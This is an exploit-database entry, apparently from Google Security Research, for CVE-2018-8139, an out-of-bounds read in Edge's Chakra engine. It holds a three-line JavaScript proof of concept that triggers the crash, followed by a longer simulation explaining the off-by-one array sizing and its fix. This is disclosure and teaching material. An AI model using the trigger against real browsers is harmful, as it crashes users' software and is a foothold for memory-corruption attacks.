Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read

EDB-ID: 45012
Author: Google Security Research
Published: 2018-07-12
CVE: CVE-2018-8139
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: Denial of Service (DoS), Out Of Bounds
Vulnerable App: N/A

BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array, copies the prepended (bound) arguments and the call's own arguments into it, and then calls the actual target function. The problem is that it does not take the CallFlags_ExtraArg flag into account; that flag indicates that there is one extra argument ( in the PoC) at the end of the argument array. So the size of the new argument array created for a call carrying the CallFlags_ExtraArg flag will always be 1 less than required, and the target's read of that extra argument becomes an out-of-bounds read.


// Target function; its body is irrelevant, only the call path matters.
function func() {}

// Binding with a prepended argument (1) routes every call through BoundFunction::NewInstance.
let bound = func.bind({}, 1);

// Constructing through Reflect.construct sets CallFlags_ExtraArg, which NewInstance ignores when sizing the new argument array.
Reflect.construct(bound, []);
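The off-by-one described above can be modelled without touching the engine. The following is an added example written for this page, not Chakra's code or Google's PoC: it builds the bound call's argument array the way the advisory describes, once with a size computation that ignores the extra-argument flag and once with a size that reserves the trailing slot, and shows that only the undersized array makes the target's read of the extra argument go past the end. CallFlags bit values, ArgBuffer, buildBoundArgs, readExtraArg and simulateConstructCall are all hypothetical names chosen for the model.

```javascript
// Added model of a bound-function call's argument-array construction.
// CallFlags values, ArgBuffer and the function names are hypothetical, not Chakra's API.

const CallFlags = { None: 0, New: 1, ExtraArg: 4 }; // hypothetical bit values

// Fixed-capacity buffer modelling the native argument array: any access at or
// past `capacity` throws instead of silently touching adjacent memory.
class ArgBuffer {
  constructor(capacity) {
    this.capacity = capacity;
    this.slots = new Array(capacity).fill(undefined);
  }
  set(i, v) {
    if (i < 0 || i >= this.capacity) throw new RangeError(`OOB write at index ${i}, capacity ${this.capacity}`);
    this.slots[i] = v;
  }
  get(i) {
    if (i < 0 || i >= this.capacity) throw new RangeError(`OOB read at index ${i}, capacity ${this.capacity}`);
    return this.slots[i];
  }
}

// `incoming` models the caller's argument array: slot 0 is `this`, then the
// explicit arguments, and (when flags carries ExtraArg) one trailing extra
// argument. Returns the new array plus `argc`, the number of slots holding
// this/bound/explicit arguments. `countExtraArg` selects the sizing rule:
// false reproduces the vulnerable computation, true the corrected one.
function buildBoundArgs(boundThis, boundArgs, incoming, flags, countExtraArg) {
  const hasExtra = (flags & CallFlags.ExtraArg) !== 0;
  const explicitCount = incoming.length - 1 - (hasExtra ? 1 : 0);
  const argc = 1 + boundArgs.length + explicitCount;
  // Vulnerable sizing ignores the extra argument; correct sizing reserves a slot for it.
  const capacity = argc + (countExtraArg && hasExtra ? 1 : 0);
  const buf = new ArgBuffer(capacity);
  let idx = 0;
  buf.set(idx++, boundThis);
  for (const a of boundArgs) buf.set(idx++, a);
  for (let i = 1; i <= explicitCount; i++) buf.set(idx++, incoming[i]);
  if (hasExtra && countExtraArg) buf.set(idx, incoming[incoming.length - 1]);
  return { buf, argc, flags };
}

// The target reads the extra argument from the slot just past argc whenever
// the call carries ExtraArg. With the undersized buffer this read is out of bounds.
function readExtraArg({ buf, argc, flags }) {
  if ((flags & CallFlags.ExtraArg) === 0) return undefined;
  return buf.get(argc);
}

// Mirrors the PoC shape: func.bind({}, 1) invoked as a constructor with no
// explicit arguments. The constructed incoming array is [this, extraArg].
function simulateConstructCall(countExtraArg) {
  const incoming = [undefined, "newTarget"]; // constructed sample input
  const call = buildBoundArgs({}, [1], incoming, CallFlags.New | CallFlags.ExtraArg, countExtraArg);
  try {
    return { capacity: call.buf.capacity, extraArg: readExtraArg(call), oob: false };
  } catch (e) {
    if (!(e instanceof RangeError)) throw e;
    return { capacity: call.buf.capacity, extraArg: undefined, oob: true, error: e.message };
  }
}

console.log("vulnerable sizing:", simulateConstructCall(false));
console.log("corrected sizing: ", simulateConstructCall(true));
```

With the vulnerable sizing the array has two slots (the bound `this` and the prepended 1) and the target's read at index 2 is flagged as out of bounds; with the corrected sizing a third slot holds the extra argument and the read succeeds. The fix the model implies is the same one the advisory points at: the allocation size must include one slot whenever CallFlags_ExtraArg is set, and the extra argument must be copied into it.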
